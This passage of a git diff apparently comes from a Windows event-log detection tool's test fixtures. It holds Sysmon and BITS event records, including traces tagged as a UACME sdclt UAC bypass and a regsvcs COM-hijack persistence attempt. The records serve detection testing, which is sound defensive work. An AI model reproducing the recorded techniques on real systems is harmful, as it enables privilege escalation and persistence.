UACME-53","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Folder\\shell\\open\\command\\(Default)","UtcTime":"2019-08-04 09:10:29.025"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5698,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:10:29.060588Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\control.exe\" /name Microsoft.BackupAndRestoreCenter","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Control Panel","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=391FF1F690C0912C217B3CF625900D4F50128867,MD5=88EA810385F455C74306D71C4879C61C,SHA256=4774A931C9D97828323C9E829917D82C27A05DAB9FEA6A0CEF9EBBA59942231F,IMPHASH=7A8EC2645C24D85DE8216D63022623C0","Image":"C:\\Windows\\System32\\control.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\sdclt.exe\" ","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"747F3D96-A105-5D46-0000-00103BEBBC03","ParentProcessId":4532,"ProcessGuid":"747F3D96-A106-5D46-0000-00107201BD03","ProcessId":1380,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-04 09:10:30.346"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5702,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:10:30.752830Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}}] \ No newline at end of file diff --git a/e2e/search_expected.yml b/e2e/search_expected.yml deleted file mode 100644 index 3c01842b..00000000 --- a/e2e/search_expected.yml +++ /dev/null @@ -1,2197 +0,0 @@ ---- -Event: - EventData: - Id: 400B6CF7-D355-4E0C-B9AE-4E8D8C8FF6A0 - bytesTotal: 1317080 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 1317080 - fileTime: "2020-10-01T02:19:35Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe" - peer: "" - transferId: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A - url: "http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A - EventID: 59 - EventRecordID: 8199 - Execution_attributes: - ProcessID: 4964 - ThreadID: 2612 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-10-17T11:50:02.661365Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: 400B6CF7-D355-4E0C-B9AE-4E8D8C8FF6A0 - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 1317080 - bytesTransferred: 1317080 - bytesTransferredFromPeer: 0 - fileLength: 1317080 - fileTime: "2020-10-01T02:19:35Z" - hr: 0 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A - url: "http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A - EventID: 60 - EventRecordID: 8200 - Execution_attributes: - ProcessID: 4964 - ThreadID: 368 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-10-17T11:50:15.796214Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Id: A5842CB6-8F50-4944-8AF7-2C088B21DDC3 - bytesTotal: 25802496 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 25802496 - fileTime: "2020-10-06T03:49:05Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe" - peer: "" - transferId: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 - url: "http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 - EventID: 59 - EventRecordID: 8206 - Execution_attributes: - ProcessID: 4028 - ThreadID: 908 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-10-17T12:32:08.987914Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: A5842CB6-8F50-4944-8AF7-2C088B21DDC3 - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 25802496 - bytesTransferred: 25802496 - bytesTransferredFromPeer: 0 - fileLength: 25802496 - fileTime: "2020-10-06T03:49:05Z" - hr: 0 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 - url: "http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 - EventID: 60 - EventRecordID: 8222 - Execution_attributes: - ProcessID: 4028 - ThreadID: 6308 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-10-17T12:36:06.775288Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Id: 20160230-2E6F-428A-A61F-20740628577B - bytesTotal: 2014464 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 2014464 - fileTime: "2020-10-20T07:11:08Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe" - peer: "" - transferId: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE - url: "http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE - EventID: 59 - EventRecordID: 8448 - Execution_attributes: - ProcessID: 2788 - ThreadID: 948 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-10-23T21:55:59.769081Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: 20160230-2E6F-428A-A61F-20740628577B - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 2014464 - bytesTransferred: 2014464 - bytesTransferredFromPeer: 0 - fileLength: 2014464 - fileTime: "2020-10-20T07:11:08Z" - hr: 0 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE - url: "http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE - EventID: 60 - EventRecordID: 8449 - Execution_attributes: - ProcessID: 2788 - ThreadID: 9108 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-10-23T21:56:21.668986Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Id: DE4AC99A-C567-4CAA-9703-3FFEE775C75D - bytesTotal: 1708800 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 1708800 - fileTime: "2020-11-02T06:40:20Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe" - peer: "" - transferId: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 - url: "http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 - EventID: 59 - EventRecordID: 8530 - Execution_attributes: - ProcessID: 7344 - ThreadID: 3400 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-11-05T10:55:56.114648Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: DE4AC99A-C567-4CAA-9703-3FFEE775C75D - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 1708800 - bytesTransferred: 1708800 - bytesTransferredFromPeer: 0 - fileLength: 1708800 - fileTime: "2020-11-02T06:40:20Z" - hr: 0 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 - url: "http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 - EventID: 60 - EventRecordID: 8531 - Execution_attributes: - ProcessID: 7344 - ThreadID: 9012 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-11-05T10:56:12.615763Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Id: FF56F08A-3D87-4A27-9E54-1444A29F0449 - bytesTotal: 2603264 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 2603264 - fileTime: "2020-11-08T13:58:52Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe" - peer: "" - transferId: 7E43CA01-DD5D-4814-8A56-15F509508F44 - url: "http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 7E43CA01-DD5D-4814-8A56-15F509508F44 - EventID: 59 - EventRecordID: 8833 - Execution_attributes: - ProcessID: 4908 - ThreadID: 4660 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-11-12T10:56:13.148615Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: FF56F08A-3D87-4A27-9E54-1444A29F0449 - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 2603264 - bytesTransferred: 2603264 - bytesTransferredFromPeer: 0 - fileLength: 2603264 - fileTime: "2020-11-08T13:58:52Z" - hr: 0 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 7E43CA01-DD5D-4814-8A56-15F509508F44 - url: "http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 7E43CA01-DD5D-4814-8A56-15F509508F44 - EventID: 60 - EventRecordID: 8834 - Execution_attributes: - ProcessID: 4908 - ThreadID: 5396 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-11-12T10:57:10.415576Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Id: 6BFD2AD8-963A-4E3D-A596-DDB00305910F - bytesTotal: 22209280 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 22209280 - fileTime: "2020-11-17T11:37:37Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe" - peer: "" - transferId: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD - url: "http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD - EventID: 59 - EventRecordID: 8971 - Execution_attributes: - ProcessID: 8076 - ThreadID: 368 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-11-18T21:49:57.232015Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: 6BFD2AD8-963A-4E3D-A596-DDB00305910F - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 22209280 - bytesTransferred: 22209280 - bytesTransferredFromPeer: 0 - fileLength: 22209280 - fileTime: "2020-11-17T11:37:37Z" - hr: 0 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD - url: "http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD - EventID: 60 - EventRecordID: 8972 - Execution_attributes: - ProcessID: 8076 - ThreadID: 8756 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-11-18T21:53:25.998024Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Id: 3774C88F-94AD-4FC0-A559-EA76B5D829D6 - bytesTotal: 1304160 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 1304160 - fileTime: "2021-01-22T06:31:14Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe" - peer: "" - transferId: 6125DC77-C387-4662-BB2F-F3816D1B4629 - url: "http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 6125DC77-C387-4662-BB2F-F3816D1B4629 - EventID: 59 - EventRecordID: 9404 - Execution_attributes: - ProcessID: 8100 - ThreadID: 4424 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2021-03-15T18:55:38.049422Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: 3774C88F-94AD-4FC0-A559-EA76B5D829D6 - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 1304160 - bytesTransferred: 1304160 - bytesTransferredFromPeer: 0 - fileLength: 1304160 - fileTime: "2021-01-22T06:31:14Z" - hr: 0 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 6125DC77-C387-4662-BB2F-F3816D1B4629 - url: "http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 6125DC77-C387-4662-BB2F-F3816D1B4629 - EventID: 60 - EventRecordID: 9405 - Execution_attributes: - ProcessID: 8100 - ThreadID: 5972 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2021-03-15T18:55:51.603329Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Id: 78E48D71-6706-4BEF-BE13-DD6596AECB77 - bytesTotal: 44403064 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 44403064 - fileTime: "2021-03-05T05:05:54Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe" - peer: "" - transferId: 606AA2F9-84AC-48B8-B85C-1712683C075C - url: "http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 606AA2F9-84AC-48B8-B85C-1712683C075C - EventID: 59 - EventRecordID: 9408 - Execution_attributes: - ProcessID: 8100 - ThreadID: 4396 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2021-03-15T19:01:32.985061Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: 78E48D71-6706-4BEF-BE13-DD6596AECB77 - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 44403064 - bytesTransferred: 19602924 - bytesTransferredFromPeer: 0 - fileLength: 44403064 - fileTime: "2021-03-05T05:05:54Z" - hr: 2147954430 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 606AA2F9-84AC-48B8-B85C-1712683C075C - url: "http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 606AA2F9-84AC-48B8-B85C-1712683C075C - EventID: 61 - EventRecordID: 9409 - Execution_attributes: - ProcessID: 8100 - ThreadID: 3656 - Keywords: "0x4000000000000000" - Level: 3 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2021-03-15T19:29:05.990760Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: regsvcser.Bypass - EventType: SetValue - Image: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe" - ProcessGuid: 747F3D96-D7BB-5D31-0000-0010D5092A00 - ProcessId: 1060 - RuleName: Persistence - COM Hijack - TargetObject: "HKCR\\WOW6432Node\\CLSID\\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\\InprocServer32\\Class" - UtcTime: "2019-07-19 14:46:20.729" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 3622 - Execution_attributes: - ProcessID: 2796 - ThreadID: 3592 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - 